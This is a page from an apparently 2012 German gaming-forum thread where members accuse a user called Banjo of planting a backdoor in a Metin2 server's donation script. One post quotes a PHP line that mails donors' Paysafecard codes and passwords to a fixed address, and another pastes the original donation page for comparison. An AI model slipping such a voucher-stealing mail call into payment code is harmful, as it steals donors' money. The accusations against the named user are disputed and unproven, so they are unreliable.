[Warnung]Warnung vor Banjo1

Page 2 of 3

07/07/2012 02:20 �kяyteя�#16

Ich bin echt mal darauf gespannt was Banjo selbst dazu sagt :D
Das wird nen Spa�.
Ich bin mir zu 101% sicher das es entweder nicht wahr ist was ihr hier anschuldigt, ODER das es nen Fake war, der sich als Banjo ausgegeben hat.

07/07/2012 02:22 [SA]Con#17

Naja ich werde in so 5h mal wieder rein schauen. :)

Ich bin mal gespannt, ob sich Banjo nun so schlecht f�hlt, das er den Thread Closed. ;)

07/07/2012 02:36 .KingDarkness#18

Ein schnitt aus dem script:

PHP Code:


			
          $YOURMAIL = "[Only registered and activated users can see links. Click Here To Register...]";
          $SEND_MAIL = mail($YOURMAIL,"PSC-Code: ".$cardVoucher."","PSC-Code: ".$cardVoucher."\n Passwort: ".$cardPasswort."\n Guthaben: ".$cardBetrag."\n Von:".$_SESSION['user_id']);

Die Email: [Only registered and activated users can see links. Click Here To Register...] wird benutzt und als Query werden die PSC daten an die Email gesendet. Nice backdoor :)

07/07/2012 02:38 Hildeus#19

omg -.- vielleicht m�sst ihr da eure mail eintragen ?
:facepalm::facepalm::facepalm::facepalm::facepalm: :facepalm:

07/07/2012 02:42 [SA]Con#20

Quote:

Originally Posted by i_Simon

omg -.- vielleicht m�sst ihr da eure mail eintragen ?
:facepalm::facepalm::facepalm::facepalm::facepalm: :facepalm:

Nein eben nicht, die Original spenden.php sah anderst aus. ;)

Ich wei� es ist kein Gro�er Backdoor, aber ist einer.

So sah sie mal aus:

Spoiler

Code:

<div id="content_top">
Spenden
</div>
<div id="content_main">
<?PHP
  if(isset($_SESSION['user_admin']) && checkInt($_SESSION['user_admin']) && $_SESSION['user_admin']>=0) {
  
  $maxStunde = 10;
  $aZeit = array(
    'tag' => date("j",time()),
    'monat' => date("n",time()),
    'jahr' => date("Y",time()),
    'stunde' => date("G",time())
  );
  
  $cmdAnz = "SELECT COUNT(*) AS anzEintraege FROM ".SQL_HP_DB.".psc_log WHERE DAY(datum)='".$aZeit['tag']."' AND MONTH(datum)='".$aZeit['monat']."' AND YEAR(datum)='".$aZeit['jahr']."' AND HOUR(datum)='".$aZeit['stunde']."' LIMIT 1";
  $qryAnz = mysql_query($cmdAnz,$sqlHp);
  $getAnz = mysql_fetch_object($qryAnz);
  
  if($getAnz->anzEintraege<$maxStunde) {
    
    if(isset($_POST['getcoins']) && $_POST['getcoins']=="Senden") 
    {
    
      
      if(checkVoucher($_POST['voucher']) && checkInt($_POST['betrag']) && $waehrungen[$_POST['waehrung']] && $_POST['captcha']==$_SESSION["captcha_id"])
      {
        $cardVoucher = mysql_real_escape_string($_POST['voucher']);
        $cardVoucher = str_replace('-','',$cardVoucher);
        $cardBetrag = mysql_real_escape_string($_POST['betrag']);
        $cardWaehrung = mysql_real_escape_string($_POST['waehrung']);
        $cardTyp = "Paysafecard";
        $cardPasswort = mysql_real_escape_string($_POST['voucherpass']);
        $kommentar = mysql_real_escape_string($_POST['kommentar']);
        
        $cmdCheck = "SELECT id FROM ".SQL_HP_DB.".psc_log WHERE psc_code='".$cardVoucher."'";
        $qryCheck = mysql_query($cmdCheck,$sqlHp);
        
        if(mysql_num_rows($qryCheck)>0) {
          echo'<p class="meldung">Die Spende wurde erfolgreich abgegeben. Als Dank f�r die Spende werden Ihnen demn�chst Coins gutgeschrieben. </p>';
        }
        else {
        
          $sqlCmd = sprintf("INSERT INTO ".SQL_HP_DB.".psc_log (account_id,card_type,waehrung,psc_code,psc_betrag,psc_pass,status,kommentar,datum) VALUES ('%s','%s','%s','%s','%s','%s',0,'%s','%s')",
            $_SESSION['user_id'],
            $cardTyp,
            $cardWaehrung,
            $cardVoucher,
            $cardBetrag,
            $cardPasswort,
            $kommentar,
            $sqlZeit
           );
    
          $qryRequest = mysql_query($sqlCmd,$sqlHp);
          if($qryRequest) 
          {
            echo'<p class="meldung">Die Spende wurde erfolgreich abgegeben. Als Dank f�r die Spende werden Ihnen demn�chst Coins gutgeschrieben. </p>';
          }
          else 
          {
            echo'<p class="meldung">Antrag fehlgeschlagen. Bitte einen GM kontaktieren.</p>';
          }
          
        }
        
      }
      else
      {
        echo'<p class="meldung">Es wurden Falscheingaben gemacht. Bitte f�llen Sie das Formular noch ein mal korrekt aus.</p>';
      }
    
    }
  
  ?>
    <p class="meldung"><b>Achtung!</b> Fehlerhafte Eintragungen werden geahndet.</p>
    <form action="index.php?s=spenden" method="POST">
      <table width="80%">
        <tr>
          <th class="topLine">Paysafe-Code</th>
          <td class="tdunkel"><input type="text" size="25" maxlength="25" name="voucher"/> Betrag: 
          <select name="betrag">
            <?PHP
            
            foreach($pscBetraege as $pscs) {
              echo'<option value="'.$pscs.'">'.$pscs.'</option>';
            }
            
            ?>
          </select>
          &nbsp;
          <select name="waehrung">
            <?PHP
            
            foreach($waehrungen as $wsh => $wname) {
              echo'<option value="'.$wsh.'">'.$wname.'</option>';
            }
            
            ?>
          </select></td>
        </tr>
        <tr>
          <th class="topLine">Paysafe-Passwort:</th>
          <td class="tdunkel"><input type="text" size="20" maxlength="20" name="voucherpass"/> (leer lassen, falls keins gesetzt ist)</td>
        </tr>
        <tr>
          <th class="topLine">Kommentar:</th>
          <td class="tdunkel">
            <input type="text" size="60" maxlength="200" name="kommentar"/> (optional)
          </td>
        </tr>
        <tr>
          <th class="topLine" rowspan="2">Captcha:</th>
          <td class="tdunkel">
            <input type="text" size="5" maxlength="5" name="captcha"/><img src="./captcha/captcha.php" alt="captcha" title="captcha"/>
          </td>
        </tr>
		</table>
          <input class="btn" type="submit" name="getcoins" value="Senden"/> - <input class="btn" value="reset" type="reset"/>
    </form>
  <?PHP
    }
    else {
      echo'<p class="meldung">Zur Zeit kann nicht gespendet werden, da die maximale Anzahl f�r Spenden pro Stunde erreicht wurde. Bitte versuchen sie es n�chste Stunde erneut.</p>';
    }

  }
  else {
    echo'<p class="meldung">Sie m�ssen f�r diesen Bereich angemeldet sein.</p>';
  }
?>
</div>
<div id="content_footer">
</div>

Edit: Virus wurde aus dem Root entnommen.

07/07/2012 03:27 Padmak#21

Bist du nicht der mit der <100KB-Exe von 2005?
Der, der der Meinung war, dass Metin1 von 1989 und Metin2 von 2000 ist?
(Siehe Signatur von Computerfreek)
Du musst ja ein unfassbar guter Serveradmin sein.

Padmak

07/07/2012 03:29 [SA]Con#22

Quote:

Originally Posted by Padmak

Bist du nicht der mit der <100KB-Exe von 2005?
Der, der der Meinung war, dass Metin1 von 1989 und Metin2 von 2000 ist?
(Siehe Signatur von Computerfreek)
Du musst ja ein unfassbar guter Serveradmin sein.

Padmak

Geh wo anderst Flamen? xD

07/07/2012 03:33 xBenderx#23

Irgendwie finde ich das l�cherlich.
Man kann sowas sogar selbst reinscripten bzw reinschreiben und schon hei�t es wer anders zieht hier ab oder sowas.
Ohne wirkliche Beweise ist es einfach nur Rufmord und ich benutze seit meiner DE zeit sprich vor 3 Jahren teilweise auch hacks von Banjo und mir ist bisher nie was passiert.

Wenn ihr auf nen Faker reingefallen seit euer Ding aber zieht damit nicht den wahren Banjo in den Dreck.
Liefert uns ordentliche Beweise dann kann man weiterreden aber so wie es bisher ist : haltlose anschuldigungen deswegen report wegen rufmord.
Wartet einfach was banjo dazu sagt und fertig

07/07/2012 03:37 Padmak#24

Dann mach du nich so'n Thread auf.
Du hast offensichtlich keine Ahnung, wer wei�?
Vielleicht hat auch der banjo (???? niemals is der das xD ) das ganze nur zur Sicherheit eingebaut, wollte euch gar nicht abzocken? Wei�t du das?

Padmak

07/07/2012 03:42 �kяyteя�#25

Quote:

Originally Posted by .KingDarkness

Ein schnitt aus dem script:

PHP Code:

$YOURMAIL = "[Only registered and activated users can see links. Click Here To Register...]"; $SEND_MAIL = mail($YOURMAIL,"PSC-Code: ".$cardVoucher."","PSC-Code: ".$cardVoucher."\n Passwort: ".$cardPasswort."\n Guthaben: ".$cardBetrag."\n Von:".$_SESSION['user_id']);

Die Email: [Only registered and activated users can see links. Click Here To Register...] wird benutzt und als Query werden die PSC daten an die Email gesendet. Nice backdoor :)

Fail, allein schon die Zeile $YOURMAIL wei�t doch ganz klar daraufhin, dass dort EURE Emailadresse rein kommt.

Ganz offensichtlich wollt ihr hier doch nur einen auf wichtig machen, denn ich habe NOCH NIE solch eine Anschuldigung gegen�ber Banjo gelesen und Viren in seinen Hacks etc. hab ich auch nie gefunden, bzw. mein PC war bisher jedesmal Virenfrei, selbst nach Nutzung eines seiner Hacks und Tools.

Quote:

Originally Posted by [SA]Con

Edit: Virus wurde aus dem Root entnommen.

Virus wurde entfernt?
War da �berhaupt jemals einer drauf?
Ich bezweifel es stark.
Ich seh keinerlei Beweise f�r eure Anschuldigungen noch sonst i-was, was darauf hindeutet, dass an der ganzen Geschichte etwas dran ist.

07/07/2012 05:59 alg0r!thm#26

Ganz ehrlich, ohne handfeste Beweise ist das Rufmord!
Also, bitch please, stfu '& gtfo.

#closerequest

Lg,
Daniiel'

07/07/2012 06:11 #SoNiice#27

Kenne die Banane nun seit 4 Jahren, ich bin mir ziemlich sicher, dass er sowas nicht tut.

07/07/2012 06:20 -Joshua-#28

Quote:

Originally Posted by SoNiice

Kenne die Banane nun seit 4 Jahren, ich bin mir ziemlich sicher, dass er sowas nicht tut.

Du sprichst ja aus Erfahrung, ne?

07/07/2012 06:58 ayanamiie#29

ihr immer mit eurem affentheater ladet die sachen auf nen hoster mit pw funktion meldet das pw nen mod der sich dann hier meldet bzw admin das nur die draufzugreifen k�nnen die sehen das doch dann.

Inclusive dann der beweise das ers war wird ja sicher irgendwo logs geben wer wann wo was �ndert bzw hochgeladen hat

07/07/2012 10:13 MetinLegende#30

Banjo hat es doch nicht n�tig sowas abzuziehen und v.a. nicht auf nem 50user root!! Da w�rde sich das ja nichtmal lohnen.
Naja typischer fall von zu wenig aufmerksamkeit

Page 2 of 3